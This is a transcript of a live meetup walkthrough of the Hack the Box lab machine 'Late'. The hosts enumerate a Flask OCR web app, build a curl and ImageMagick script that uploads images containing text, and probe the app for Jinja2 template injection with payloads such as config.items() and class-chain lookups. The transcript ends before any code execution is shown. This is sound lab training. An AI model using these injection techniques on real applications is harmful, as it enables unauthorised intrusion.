Hello, everybody. Welcome to our 30th meetup. Um, Today we have a very nice walkthrough of a machine called Late, together with Dippler, who I'll summon. There he is. So,
Hi.
hi, Dippler.
Hi. Um,
Want
should
to
I?
introduce yourself?
Yeah. I'm Dippler or Jeroen. I'm a software engineer, and I like cybersecurity topics.
Nice, nice. And today we're going to do a walkthrough of the machine Late. So, yeah, that will be great fun. Can you tell us something about your experience doing Late? Without too
Yeah.
many spoilers, of course.
It has some nice creative ways to get a foothold. I would say. I enjoyed it a lot. It was a lot of trial and error on my side, but it was a lot of fun.
Yeah, for me as well. We were just talking about it pre going live in the Discord chat, and the IPSec video was 22 minutes. Well, I needed at least 23 myself, maybe 1 hour and 23 minutes, something like that. There's a lot of little rabbit holes that we will encounter, and so yeah, that will be great fun. That would be great fun. Yeah, let's just get into it. We, as opposed to normally where Dippler would share his screen, we decided to mix it up, and I will share my screen. So I will be doing the typing and moving around. So yeah, the machine that we're going to do is Late. It is an easy machine. At least that is what Hack the Box says. If we look at the user rating, it is somewhat more to the medium part. I think the foothold area is something that most people would say like that was a little bit more difficult than it being easy. Yeah, and for the rest, machine rating of 3.2, so it's a little bit of meh. I kind of liked it. I kind of liked it. So let's look at the bloods. 7 minutes and 16 minutes. So we'll not look at that. We'll just take we'll just take the IP address and we'll get on its way. Right. So, Jeroen, what shall we do first?
Well, I always start off with an Nmap scan. It's just the easiest
Yeah,
way.
yeah,
Mo-
like we should all do.
Yeah,
I
most
think
times I start with the top ports of like 1000, and if I cannot find anything interesting, I'll just increase the number
yeah,
or just scan all ports.
yeah. I
I think.
already added the machine to the host file, so I can just do ping late.htb. Nice, and we can do the nmap, right? Let's see what it does. As always, it's a little bit slow, but yeah. So what did you take away from your first impression of the scan results?
Well, of course, it tells us there's an Nginx server there on port 80, so that's always interesting to just open up your browser and just have a look around.
Yeah,
So
true
I'll just
story.
first do that.
Late, uh, world's simplest image utilities. That is a beautiful thing. It's also it says here in the server header, the Nginx 1.4 with the HTTP title of "Hey, best online image tools." So that's the same. So yeah, nothing much more from the scan results, right? We could uh, we could set it to scan everything in case we have more. But I don't think the machine had anything else than this, right?
No, most of the time I
So
just let that run in the background and just
yeah,
start investigating port 80.
yeah, true. It's even finished. So nothing more than that. Yeah, yeah. So we'll just start focusing on the web interface as SSH does not ring a bell as to a super vulnerable something or vulnerable keys or anything like that. So let's do the website. I will zoom it in for the viewers. Um, there's Hamza says we can also combine the flags min S, C, and V. I always do them separate, but you could probably do that. So let's see. What do we have here? It looks like almost like a WordPress website, right?
Yeah,
Basic.
it was my first hunch as well that it was WordPress, but I don't think it is.
No, it's probably one of the teams that they took for it. So only home and contact, nice form, not a lot of information. Does this button do anything?
I'm not sure anymore.
No, it's one of these days they should make a hack the box machine that the contact form actually does something. Now it just does a get, so it's pretty useless. So a home, fast and simple edit tools. Nice. It covers all online photo editing tools, so you can crop images, resize images, add text to photos, and even make photo collages and create graphic designs easily. Nice. Any interesting things here?
You have one URL that could be interesting.
There's actually only one thing to click here. We could do a page source to see if there's any comments or something like that. There's actually a little bit of a comment to do item. Where is it? Let's just scroll past it. Where did it go? To do replaced by link instructions in template. Beautiful. So it's basically a template that was copied, and that's it. So, The only thing that we can do is click this link. I have a StreamYard stream thing. It goes to images.late.htb, as it says in the status bar. So we need to add that to our host file, which I already saw that I did. So we have the images.late.htb added. There's a wonderful tool called Head that you can use to manipulate your host file in case you don't feel like opening an editor. It's a shameless plug. It's my own tool, but it works really, really nice. So if you find it difficult to edit host file, you can use that. So yeah.
So I don't know if you have done this as well, but always when I see a web server, I always start some Go scanner, Deerbuster, whatever.
Yeah.
Did you do that as well, or?
Yeah, it's I generally use Ferox Buster. I don't know if I have Ferox Buster. Why? I don't. It has a lot of same defaults, which is really nice. Let's give that a try. Late.htb.
So the Ferox Buster is the one that also does the recursive search, right? So it finds oh, you can see it over here. It finds assets, then it finds image, and then keeps.
Indeed. Yeah, it is a very nice tool. It's one of those tools that we will write it in Rust. Every time there's a beautiful new language, people start rewriting tools in it. There was Go, and they start writing a lot of stuff in Go, like GoBuster. Then Rust became very popular, and people started trying to build new tools. So Feroxide is one of those tools that is re-implemented in Rust. But what they did is really nice. They have a lot of same defaults, like the content discovery list that they use. It's actually from the sec lists. Normally, you will see that people use word list from Deerbuster or something like that. Sec list is a little bit more organized and larger. And so they have a beautiful default there. It's multi-threaded. something that most Python applications don't do. Let's skip over that. Yeah, and yeah, I don't want to get into some form of holy war anymore. Um, uh, yeah. Boris says I cheat. Well, I actually prepared this afternoon on my laptop and made sure there was no spoilers on it from what in the host file. And then I decided to actually do it on my desktop, but then I forgot to check the host file. So, oops. So apparently there's a new version available, so you can also see that. But yeah, and it does a lot of beautiful things like recursive scanning. So you have late.htb, finds an assets directory, and then it adds assets to the list of things to check, and it starts doing it all over again. Yeah. G says, I thought I was going to share his stream. Yes. There was a thing here. Oh, I think he means that I was going to share it on Discord. Yeah, all right. I'm lacking, yeah, indeed. So yeah, but not a lot of stuff to see, right? It's a very simple website, just assets that has some images, JavaScript, and CSS. But we actually have two websites, right? Where are you? Shameless plug, we can leave it. Let's click on this, and we have images.late.htb, and this makes it very interesting. Let's quickly add it to the Docsbuster as well. We have the things to just do. Yeah. What did you make of this?
Yeah, so this was my first, what do you say, rabbit hole, I guess. Because if you see a file upload, my brains go racing for all kinds of vulnerabilities, trying to discover the content that was already uploaded by someone, or do some local file inclusion, or that kind of stuff. So, but if we just look at the website, and I realized that I didn't read because I was like, oh, what can we do here? And
there's a big button here. There's a big button. Click it.
Well, that would, yeah, I could see that button, but it was like, what kind of backend would this be, etc., etc. And then it just says it's convert image to text with Flask. So that Flask is a framework of that runs in Python. So web, how do you call that? A web framework?
Yeah, I would say it. Yeah.
So yeah, I just tried to upload something and just see what the request would look like.
Shall we open up Burp as well?
Yeah, I think that's great. Did you notice on the new Burp? I had an old version of Burp for a long time, but now you can open a browser from the proxy that is automatically connected. It's a Chromium browser. I really like that. I don't know if anybody knows.
Let's give that a try.
Yeah, it's really cool because you always have the hassle of accepting the certificate of Burp and then connecting your browser to the Burp proxy, etc., etc. Yeah. And with the new version, it's just click the button, it starts up a already connected browser, and it just makes things easier.
Yeah, let's give it a try. Help improve? Nope. Accept. Let's see. I have not tried that yet, so I'm up to try new things. I generally just use the Foxy proxy.
Yeah, me too.
Thingy.
But it's always a hassle to set up when it's on a new machine or something. I think this version. What version is this? 21.
Yeah,
it might 21. Not have it. Can you press proxy?
Oh. Wait. Can I press proxy? I need to first find.
On the tab.
Yeah, there we go.
Open browser. Look, it will open up a Chromium browser that is already pre-connected to this proxy. So, how easy can life be, right?
That is awesome. That's one thing that I never look at these things because I always think, it's stuff for pro version, and I
I know the feeling.
And I will feel miserable if I click on it.
Yeah, I know.
But this is very nice. It's nice.
Yeah.
In the meantime, Baga said, who tried things like image statics or payload SVGs or PNGs? Yes. He says the Burp browser has been there over a while, quite over a year or so. Yeah, look at me running out behind. I did not know. I didn't know. It's beautiful. Intercept off. It's always the same. No, that's not what I want. HTTP dot. What's the image of images?
I think it's images.
HTTP. Yeah, there we go. There we go. Beautiful. Beautiful. Yeah. Let's look at the proxy and the history. Yeah, I generally I will clear all this stuff.
You might need to increase your font size a little bit on
yeah, yeah. Let's do that.
user options.
Your options. Yeah, yeah. It's kind of like my second nature to put everything in large fonts. I have that with my students as well when we do online classes or we have our Friday hacking sessions. And then it's always, can you increase the font? So if I'm at home, everything is like these huge fonts.
You can read it without glasses.
Yeah. Let's see. Actually what I did as a first thing, I found this title so interesting. Convert image to text with Flask. I thought, well, okay, who would actually put stuff like that in a title, which was kind of like my OCD, I guess. And I googled the title, and there's actually a bunch of projects, and I think some of them are the basis for this project.
Oh, for real?
Yeah.
Okay.
So I don't know. I'm just opening this one. Let's see if it somewhat resembles what we are looking at now. I tried a couple, and it was quite funny because it seems to be a thing to make an OCR application with Flask. Go back.
I wonder why.
Yeah. Good examples, right? Good examples. So yeah, we have the thing. If you want to turn an image into a text document, you came to the right place. Nice. That's beautiful. The first thing that I did, first thing to actually try it, I actually quickly the apt install Flameshot. I did a whole bunch of things, right? There we go. I tried uploading random files, and if you use the proper font, so I clicked it. There we go.
So Flameshot is pretty smart, right? So you can just type and then.
Yeah. Let's see. I can. What shall we upload? Let's do an Emba. Why not? Let's see what it says. Invalid extension. It's just a bummer. So SVGs it does not understand. We need a Muppet image, of course. I always do Muppets.
Can we do Beaker? I like Beaker.
Oh, God. Stop. This throwaway machine, go away. I just want the image. Thank you.
And they blocked it. Oh.
No. Look at the CPU. It's got like 8 cores, 16 gigabytes RAM, and I started Burp, and this is what happens, right? There we go. Save image as. I think it's Burp. I hope it's Burp.
Somebody else owns your machine now.
Oh, there's a WebP image. I don't want a WebP. So beautiful, beautiful. Why do we do Beaker? Can we just?
Why did you go to this side? That's the problem.
I just did like a first one. The Disney retort web. Horrible. We should have these things ready and at hand.
Mm.
I just had an Emba logo. I don't know. Have you heard about Emba?
I don't know what it is.
No, it's used for IoT firmware analysis.
Hmm.
Okay, I give up on this. Sorry. There you go. Go away. And I'm going to do a top to see what is actually used.
Yeah, I
on
thought my
CPU.
machine would be wonky, but
Oh, wait, I did an install thingy as well, right? So maybe that works. Okay, look, nothing happened. Nothing happened.
wow,
Flame
it's a
shots.
lot of CPU.
Yeah, I don't know why.
Why?
Right. So one of the things that I did. Where's my flame shot icon? Oh, flame shots. Yeah, I mean GUI. GUI. There. Let's make a screenshot of something. I actually did my editor or something like that. And so I created screenshots and I just put it somewhere. So save. Because I want to know if it actually did OCR, convert the image text document. So that seemed like a reasonable thing to do. And that's not it. Now let's. And I did scan image. And it actually gives a result.txt with, it's not perfect, but it actually did a lot of OCR. It's quite nice. So that was something that I found useful, and in this in the same, it actually set me up to a wild goose chase because I thought maybe the thing that is on the backend side is one of those image processing things that has a known vulnerability because it's an easy machine. So I started looking for buffer overflows on image parsers and stuff like that, which was font size. It should be good. So yeah, but I tried a lot of things, but there's actually not a lot that happens here, right? Because you upload an image, and yeah, that's it, I guess. Did I do it in a wrong thing? I did in a wrong thing.
Yep.
No.
I'm not sure.
Oh, there we go.
Oh yeah.
Yeah. So yeah. So we can upload an image and we get some stuff back. It actually reads it. But yeah. What did you try? What did you?
Well, I was when I saw the result coming back when I tried the OCR thing. I saw that it was HTML, so I was like, okay, is there some kind of XSS that we can try? Or so I was like alert and stuff, but nothing happened. So, and I also saw in the result that it doesn't. Sometimes when you upload a file, it also here it tells you in the content disposition here it's an attachment, file name is results.txt, and sometimes it just tells you more of the path where it is saved. But this time, no. So I was. I don't really recall what I tried next. I think I just started iterating the XSS idea and tried some things with Flask, and then I came to the next part. But I'm not sure how fast you want to go.
No, I wanna explore this a little bit. Because what I also tried was to do things like intercepting it and going and taking SVG, for instance, adding it and then changing the extension here to PNG to see if it would actually accept it. And that gave me interesting information, actually a path disclosure.
I remember this one,
Because it says it cannot identify the image file, and it says home svc_acc app uploads Nmap PNG 8516. So apparently it creates a unique file name by appending a number. But there's an uploads directory and an app directory. Let's see what happens in the chat. Yeah, somebody had a great idea, right? Yes.
Yeah.
Yeah, so I thought maybe we could do stuff with this, right? So we have this uploads Nmap PNG thing. So I thought maybe, just maybe, we could request that. That did not work. And we could do the full path here, but that will also not work.
But it does give you some juicy information, right?
Yes. The beautiful thing here is that, well, we know it's a Flask application, and a Flask application generally has a directory called app. But we know part of what happens. We know the upload part, and we know the user, probably the user account under which it runs, which is quite interesting, a service account. So that could be useful. Yeah, and I uploaded like gazillion images. Yeah, that's where I got my first. Okay, so what shall we do now? And then I started iterating over the idea, and I think it was this first hit that I got here. I think I don't remember if it's, maybe it was the Medium page. But the thing that one of these examples did, oh, I hope it's the example app. If you Google the title, it actually goes to a tutorial that shows you how to make this an application like this, and it actually uses templates for generating the output, which is quite interesting It is one of the standard practices for Flask to use Jinja. I think it's called Jinja. Templates, which is quite interesting. So my mind went there, and I started trying to figure out if this would be susceptible to template injection. That's where I went eventually. And this eventually is after like half an hour of trying stuff, right? It's not like the IPSec, oh, we have an image here, let's try this template injection.
Oh, wow, we're so lucky.
Yeah, I don't know. I have not seen the IPSec video yet, but if you are watching and you've seen the IPSec video, I wonder how fast he got to the template injection part. So how do you approach a problem like this when you think, well, maybe it is something like this? How did you go?
Yeah, well, I'm quite familiar with templating because I'm a developer in C# and
oh, poor you.
You have things like Razor HTML, and that also supports templating. And from the templating, you can most of the times you run it through a piece of C# and that will return an HTML page. And the piece of C# can give information to the page that will be via the template injected. So sometimes you would add a username to the page or some information you need for that page. So I was thinking about that, and then I would just Google stuff like exploit template engine or something. And I finally got to the Hacktricks hack books.
Okay.
What's
yeah.
the name? Hacktricks. And it has a whole segment on template injection. So that's how I got there.
Yeah, nice. My favorite thing to do is payload all the things. Things. I don't know why I do it in this browser. But not a robot. It is due to my VPN, I think. Crosswalks. Let's see if we can outsource crosswalks. In the chat, the Kruisen has a very good comment, and he says that IPSec does walkthroughs and not live hacking sessions, which is very true. I think we have all them. Yes, I proved that I'm not a robot. Oh, man. I will throw this VM away. It will be fine. Right. Payload all the things. It's a wonderful repository. We'll actually start doing. I think it's actually Chrome that is the problem here. See that? I open GitHub.
Well, Chrome is known for its resource friendliness.
Yeah, and there's a server-side template injection directory here, which has a lot of information about templates, templating engines, and doing injections there. Yeah, and in the chat, the Kruisen, he already says, anytime there's a Python web server, it probably has some Jinja stuff in it. So you could automatically make that jump, which is really nice. Yeah, so payload all the things, template injections, as said, ASP.NET Razor for those stuck in Microsoft landscape. Stuck. Java Jinja 2. There we go. Let's click that. It will move down. Yeah, and at this point it became very nice. Let's see. Rebecca says, I'm on Discord because I can't find it. Can somebody help Becca to the Meetup voice? I see there's a bunch of people in a voice NL as well. Maybe Hidde can move them forcefully into Meetup voice. Yeah. Let's see. And Ali is showing up now. So Ali, good morning or afternoon for you. Yeah. So we have my technique of doing a screenshot actually worked nicely here. Because what I did at this point, I need to move this out. I just made a screenshot of the page. There we go. Give me my GUI. There we go. So I made a screenshot of this this template thingy. Where's the save icon? Do it. Oh, here it is. SSDI 1. There we go. So there's some basic injections for those who do not know. The entire point of a template injection is that the programmer actually takes something that is given by the user and uses that as part of a template to expand into actual return HTML or whatever the template is supposed to do. And there are a bunch of things that you can do to actually identify which engine it is. There should be a very nice flowchart here. Yes. So that if you want to do it one by one, you could say, oh, actually, we could just try and upload this image, see what happens. I did not try this, but I think that's a very interesting idea. Let's give that a try. But the idea is that you take the first one. If the dollar accolade 7 times 7, if that does not work, then you try this one. If that does work, you can do the other one, and then it says, well, it's either Jinja 2 or Twig, and the other way around. If it does work and this works, then it's probably Smarty. If it doesn't work and you do this one, it will be the Mako templating engine. So they figured out all the ways to combine simple tests to determine which templating engine it is. It is very nice, very nice. And actually, I don't know. Have you ever attempted the OSWE certification?
No.
No. One of the things that they are very heavy in is template injections. And it is quite interesting because during the course material, you learn very interesting ways of applying templates, which is quite interesting. But enough talking. Let's upload this beautiful flow diagram.
So also just to clarify, if the template 7 times 7 works, it will return 14, right, in your result. That's an important thing to take.
49. 49.
Oh, 49. I'm sorry, 7 times 7. Yeah.
So, you can also do 7 plus 7, and it will be 14.
Yeah. So if it shows the result, and if it doesn't work, it just prints out this probably.
Yeah. So if it prints out something different than what you put in, it is probably vulnerable for it. That's the idea. So let's just see what happens when we run this one. Do the scan image. There's a result.txt. And it is quite interesting. We'll just do this. This image was not a very good idea. That's what I think.
It does detect Jinja.
It does detect Jinja. I don't know if it actually went through the flow chart and says, well, this is the thing you should have. But that was not a very good idea. So I will upload the thingy that the screenshot that I made. SSTI1. It is actually a screenshot of the basic detection sets that you can do. Where are you? Groovy, Java, Jinja. So it's a screenshot of the basic injection block. And we will... oh, that's interesting. Expected token end of print statement got string. Totally not what I expected what would happen today. But it is very interesting. Let's take a look at what I made a screenshot of. Maybe I made a screenshot of something added to it. No, it looks okay. Maybe you should zoom in a little bit.
Yeah, I think the biggest problem is the quality of the OCR here.
Yeah, the fonting. Yeah. Let's give that another try. Frame shots. It being so laggy. I think it's the Chrome thing. There we go. Let's give that another try. I think most people had most problems with just getting a good font and getting things recognized correctly, right? Did it do something? Almost. I think I will be turning off this very nice browser that you introduced. Yes, there we go. Let's move back. Yeah. Let's do the number 2. We'll do the scan image. Now it gives us a result. And look at this beautiful result. This is really magic. Let's take a look at what we actually sent in. We sent in 4 times 4, 5 times 5. That's 16, 5 times 5. So what we know is that this part was actually evaluated. It actually took this and said, well, what is actually 4 times 4? So we know that it actually does template expansion. And 777 would result in 777. That's true. So 7 times the character 7 would actually print 7 sevens. Right? So that happens. And then the really nice thing is that it actually prints out this beautiful config thing. And it's actually one of the standard Flask elements. You have a config object on which you can call functions. And in this case, it does items. And these are all the items that are part of the configuration. So that's quite nice. So we see that's in production mode. Debugging is set to false. Secret key is this beautiful thingy here. It's actually a binary string, right? So this entire thing is it's probably here somewhere in this part, this one, yeah. So this is encoded binary string. Server name is nothing. Application root is /. There's a session cookie. Yeah, not too much, but it actually works, right? So this is quite nice. So what did you do now?
So one of the biggest accomplishments of that night, the first night I was trying this machine, was getting this config items because my image OCR was a mess. And I didn't try the screenshot thing you do. It was pretty smart. I used a third-party website that was very crappy. Let's see what I tried next. I also got the config things. Oh yeah, so then I was like thinking about, okay, I can perform functions. So you can read the config blah blah function.
Yeah.
You could do that. So maybe you can access more functions. That was my first thing. So maybe there's a function on the server-side class that you can access. And that, well, kind of spiraled out of control because you could do a lot in Python. But
true story.
a lot of things didn't work. So I think it was I saw it on the payload all things side as well, that there are some interesting things to try and move up the class chain. It's a little bit more down.
Debugging, and here Dempal use classes and stuff like that. And this is where.
Oh, sorry.
No, go ahead.
Yeah, I was gonna say a lot of these things didn't work for me.
No.
It all gave me exceptions, just error pages after error page. So it was kind of a trial and error process here.
True story. Let's do my quick trick again. At this point, I actually decided to go full-fledged onto the template injection.
Mm-hmm.
So could have been a very big rabbit hole, of course. But you notice that it is a lot of hassle to actually make a screenshot or find some text, stuff like that. Then go to the browse thingy, wait for the browser.
Yeah, it's a painful process.
It's a painful process. So click here. We'll download. List object has no attributes class. These are the types of errors that you would be getting, right? Basic Python things. So the first thing I did at this time, I already found myself to get very irritated by the steps that I needed to take. So I started looking at doing some automation.
Mm-hmm.
A simple thing like taking the post request, copy as a curl command, and then pasting it here. Oh, come on. Did we not paste it? Still working on it. Oh, God. What did I do?
So what did you actually copy? What's on your clipboard now?
It should be. I said copy as curl command. I did this one. But judging from my 100%, there we go. The problem here, of course, is that it tries to copy the image along, right? So let's throw away this browser theme. Curl upload image. There's actually a way in curl to actually take a image file along. Never copy from the question. Always go to the answer. And yeah, you will not know how much time I've lost in my life of going to Stack Overflow and then copying from the question, only to figure out that I have the same question as that person after running their code and looking at the answer. So yeah, let's go into an editor thingy here, plus this one, right? Right, and let's see if we can close whatever is taking up all the effort of this machine. Oh, there's nothing going on now. Okay, right. Let's remove this thingy here, and we will want to do a post to HTTP. What's it called? Images.late.htp. And there's some people that will actually turn to Python at this time. No,
Some people do, yeah.
Some people. I don't know if you are one of those people.
Yeah, I tried it with Python and I got something working.
Nice.
It's basically, it looks like a lot of like the sending step is a lot like this.
Yeah. So I don't know if there's any special thing that we need to do.
Not sure. I will check my notes.
I will see if this works actually. I have no clue anymore because it's somewhere in my bash history and I do.
Oh yeah, I think you have to set the file header. I see in my Python script it says the file header with the multiport form data. That's important. Maybe it works without.
File name, file. That's name file name. Let's give it a try. It will be hopeless, and by the time I have finished saving this document, Chris will already have like this beautiful script running, doing everything that it should be doing. But yeah, 6 uploads. Build to open read local from file. Nice. Let's add a verbose thingy. Probably.
Is a file there?
Yeah, it's there. -d. There we go. Copy with -d. Curl for the win. Yes, okay. Do we need the quotes? We'll see. Always fun. Field to open. No,
Sorry.
it should be there. It should be downloads, right?
But you did a capital D. Didn't you mean a non-capital D to make the post data?
No, I just.
I'm not a curl specialist, so I don't know.
I had too few characters in my downloads. Like this. Oh, there we go. That's better.
It works.
Well, almost. So it does that. It does a get. So we need to make it a
post.
Yeah, indeed. The funny thing is that the YouTube stream lags behind about 20 or 30 seconds. So by the time I have actually fixed it and I'm telling on the YouTube stream that this was the issue, people start posting, this is the issue. So that's
suggestions, yeah.
Bad request. We're almost there. When you say switch to multi-part form data. Yeah. All right. How do I do that, Bart? I don't want to Google it anymore.
Tell me.
Now we need to wait 20 seconds for Bart to actually hear it.
Isn't just a header that you can add?
Yeah. I always forget. And it is -f. See, -f. It was -f.
for the file.
Yeah.
Hmm.
Minus F file is something like that. See what it does now. See, now it's
Oh yes, it
cannot
worked.
identify image file number 2. Now we don't know if it actually did it correctly. Let's see the number 1. Did that work?
Yeah, I guess that one was the 777, right?
Yeah, I think so.
Oh no.
Yeah, no, it actually works. End of print string. That works. That works. That's beautiful. We just need to figure out the proper. And I was so good. I saved all the images, right?
You forgot the
STI1.
numbers.
Number 3 then. This is the error that you had.
Yeah.
This object has no attribute.
Yeah.
I wonder where my actual this one should work. This is that one. Yeah. Server side doesn't work. STI1. Oh, I messed it up.
That's a nice one.
Yeah. Apparently I did that. This one did not work.
Yeah.
All right. We'll try this one instead. There we go. This one should actually give us the proper output. Quite interesting that I, on the file system, messed up that one file. That actually worked. Almost. Yes.
Yeah.
So if we now remove the -v part, and we are a good user bin env bash, but then we should upload something and it will actually give us the output, right? So first step in not having to do the screenshots all the time. Yeah, F is multiport indeed, -d is for files body. Yes, we fixed it. We fixed it. Beautiful. So we have a small script that actually uploads a file that we already have. You said you used Python, so you probably used Pillow, right?
Yeah.
Pillow to generate images. I actually did not. I used ImageMagick for it. Maybe when we're done, I think it's a very interesting thing to actually share the script that you wrote onto the Discord as well.
Yeah, sure.
See what people think about it. Yeah, I changed my name. Actually says I have a lot to learn. I see, and yeah, like Barry says, we all have a lot to learn. I don't know anybody who actually thinks they know it all, and if they know it all, they probably don't. So, yeah. I've grown very accustomed to not knowing everything. Now, I actually used ImageMagick. ImageMagick is a toolkit. I don't know what it's doing. ImageMagick. With a CK, with a beautiful wizard as an icon. And ImageMagick, whenever on Linux you want to resize an image, you have to rotate it, you have to change the color, you have to make it black and white, you want to flip it, you want to squeeze it, you want to scale it, you want to cut it, you want to do anything with an image, pretty much ImageMagick will be able to do it, which is quite nice. It also means that it has so many options that it's the most horrible thing to actually start using. But I did it anyways. I'm going to close the browser. I want to have my machine back. Give me my machine back. Close. There we go. There we go. Now it should be easy. So in order to cheat a little bit, I have already put my thingies here. So yeah, that's a little bit of cheating. And I will go through them one by one. Move this one real quick. There we go. The first one, what we want is to have an image, right? We want to upload an image with some text and get that so to do something that we want. So we need an image to actually put text on. So the first one creates a 1280 by 900 image with a white background called empty.png. Yeah. Life is beautiful. Huh? Yeah, generally at this time, my son will also be coming around somewhere and start poking his head around. Are you in a meetup? Stuff like that. One of these days, I think maybe one of the coming physical meetups, I'll actually bring him along because he wants to see what happens. So that will be quite fun. But yeah, beautiful how that works. So with convert, we can create an empty image. So if we run this in the terminal, empty.png. By the way, I'll do this in my home directory. Please don't be like me, right? Be responsible, create a directory, do stuff there. But I'm going to toss this VM back to a snapshot, and so that's my excuse. Okay. So if we open this file, empty.jpg or PNG, whatever you want, it's an empty file, and we can write text on this. Also with convert, and the thing that we already talked about, the font. The font is a horrible thing. And the OCR is very finicky. We saw it. We had to zoom in, and then it will actually read it and stuff like that. I found this Vira code, or a font that actually individually characterizes the characters of the string, and especially the underscores. You want to have clear spaces between characters. So, and Vira code does this. I put it on a 20 with a color of blue. I don't know why I did blue. I think it's simply because the Stack Overflow answer that I copied this from had blue. Whatever. And then we have to tell it what to draw. And in this case, I want to have some text, and I can say where I want this text. And we can put some text. So Muppets are awesome. And we can verify that we can do the 7x7 template injection. And what it now does is crucial. So it takes that empty image as a empty.jpg, and it says combine the text and that image into a new file called image with text. And then we can say upload that to this beautiful scanning service. So with 3-ish lines of thing, we should have something that will automatically create an image and then upload it. Yeah. See if it works. I did a lot of talking and probably will fail miserably, but here we go. There we go. Muppets are awesome. 49. So if we look at image with text, what it created was a very bad character, but very readable for a computer. Muppets are awesome. 7x7.
So, but one tip when you are doing this at home, when you create an image and you send it to the OCR stuff, I noticed that when you add the first character really close to the left edge or to any edge that you have on the image, it tends to misread it.
Oh,
So
okay. I
sometimes
put it at 0. And it's really at the edge, but
yeah, I had some issues with that, so I just
so
it-
if
gave it a
we
little
can
bit of space. Yeah,
give
that's
it a
fine.
little bit of space. Let's see if it works.
Wow.
What? Well, no, it's probably that that it did something stupid, right? No, it's
It did work, though.
error process unexpected stuff.
So I think the
will do.
OCR is failing here, isn't it?
Yeah, indeed. So now I put it right on the edge, and it works. So that is
Magic.
quite interesting. That's quite
Magic.
interesting.
Yeah.
One thing I notice is that probably this is not the Vira font, right? I know the Vira font from my beautiful code editor, and this kind of looks something a little bit different. All right, so we have something that will generate an image and upload it. Now we just need to not have to edit this thing all the time. So let's give that a try. Text becomes. Now I need to figure out how it.
Is it $1 or something to get?
Yeah, I think it's one. Let's echo create document with text. Text. See, and now I need to learn
you
how
called
to
it
type,
test.
right?
Yeah.
It happens to me all the time. Echo uploading payloads. Back. That's a very good one. Boris says do the 1+.
Is that because you are giving it multiple arguments when you do a space, or is that why it does
this
plus better?
work? Let's see. Plus. No, that's not it. Maybe start. No. Wait. No, there we go. That
What I
works.
would do is just add a string on the command line. Just do $1.
Yeah. This works.
This works.
So $. Yeah. Renee says add it to the convert. I first want to see if it works. And now people want to go rush. I like to go in small steps so I know it works. And this will probably not work as this is between single quotes right here. So we need to figure out if this actually does something. See, now it says $text, and that's because there's single quotes here. So these need to be big quotes. And now the question becomes, will it actually work, or do we need to do different things? Nice. Creating a document with does this work? Uploading it, and we get does this work? So we could say that this works. Right? Now the obvious silly thing here is that if we do the accolades and stuff like that, that probably will not work because also maybe sometimes. But maybe the shell will do some expansion as well.
Oh, huh?
Nice.
Oh, it reads it as a 4 or what? That's weird. The OCR just guesses what it is. What?
No, that this is.
Can you add spaces between the 7 and the asterisk?
It's getting close to the
edge. Or
to
something.
the edge. It probably misreads it. Either fix what are you doing wrong. Trying to do it through a proxy without having a proxy, maybe. Connection refused. Yeah. So this works. So we know that if we do add some a little bit of space, it's quite funny. Okay. Something for that, and then we can somewhat reliably execute our template, which is quite nice. So yeah, this was a little bit of work, but now we only need to worry about editing this thing here, and then we can upload it right away.
Yeah, it saves you a lot of work.
Yeah. So you said, hey, on payload all the things, there's the server-side template injection. Let's give those things a little bit of try.
Yeah.
Payload all the things. Let's go right to it. Right, we can do a lot of things. Dump all the classes. Let's just give it a try. We'll do one of our things here. This is actually the one that had the error that we saw. So maybe we can do this one. And here, some knowledge of internals of Python comes in very, very handy. That's interesting.
Non-conforming drawing primitive. What?
Yeah, it's
Oh yeah,
probably
the single quotes are. Yeah. You can make that. How do you escape that on Bash? Is it a backtick or something?
I'm going to do it differently. There we go, and I'll add the quotes.
Yeah.
Something like that. See if it works, and then I'll explain it. Something. The OCR is not very good here. Maybe we can add some spaces, make it clearer for the thing.
Yeah, also tried that.
Classes undefined. Okay. I'm not I'm not highly convinced that it's working.
Can you open the image so we can see what it's? You have it on file, right? Yeah.
Yes. So this works
this
now.
This is what it should be. Yeah.
Yeah. We could increase the font size a little bit, right? See if that works. Yeah, now it's better. String object has no class. Nice. Let's see how much space we have. Maybe we need a bigger image. All right.
No, I think it's reading it okay. I had the same issues with this, and other commands were working.
Okay, something like that. All right. So now it gives a proper Python error that it has a problem doing this. In this case, it cannot do the class on this string object. Okay, so let's continue on. Maybe the underscore class, and this is where I lost a lot of time. Those underscores, and this is where the font thingy becomes in really specifically. Because when you look at my screen now, you will see that it looks like there's one underscore, there's one straight line. And what you want is that the OCR recognizes it for what it is, that it's two lines. So let's see what it does. As is undefined. It's quite interesting.
It's working though, because it's returning the double underscore.
Yeah, and we see in the image it has the very clear, distinct characters. So that's very nice. But sadly, this does not work yet. So generally, I think this is due to Python 3 versus Python 2, but I'm not very sure of this. So what I did, I just went from top to bottom. This is when you actually can add to the template, which is not the case. We already saw that we cannot do the class thingy. So let's do the config items thing. And you'll notice when we put it in a screen with a little bigger font, we start to become very application specific. These config items here, you see indexes here. So it relies on having a particular type of object at a particular index, and then going from there. This will not work, I think. No. That's because I did a boo-boo. I need to quotes. Yeah, here it's got Q. It does not know what to do. In Python, if you can get to particular types of objects, you can call a class and then do the method resolution order, query those, and then based on that, get a particular index, get the subclasses from that, and then use that to actually access functions that are in the method resolution order. But it's highly application specific. So this is very experimental. We should actually start instead of doing all this at once. Oh, not that's interesting. Let's do that once more with more feeling. We should actually start with something like this to see what is in config items. Big items has no number 4. So there we go. So to go from here and then just go step by step. This is very tiresome. But sometimes the only way to do it. If you for instance, if you do the OSWE certification, you in one of the labs, there's this one machine that you only get this config array, and then from there you need to figure out the method resolution order and then the classes that you need and going through it. It's very interesting, but not something you would want to do. Now, then there's this thing. This was added based on a class in Flask itself. If we take a look at the code here.
Can you zoom in a little? Yeah.
So there's this, what's it called? The flashes thingy, or is it? Get flashed messages. And basically these are the messages that are passed along while working in your application. And it allows access to something called globals, apparently. So let's take a look at that. We'll do it step by step. Because in the end, I ended up using this method. Right? There. Right. This looks horrible. Look at that. It looks horrible, but basically what it does, this object that is returned allows us to find all the global entities within this Python runtime, which actually means modules, stuff like that. So we can go and look through all this. This is very beautiful. I would highly suggest, if you want to do that, to actually run this through a converter from the HTML encoded back to normal people stuff. Yeah, it's unreadable. But
that's a tool as well, right? So you can just paste it in to say decode from HTML, I think, and
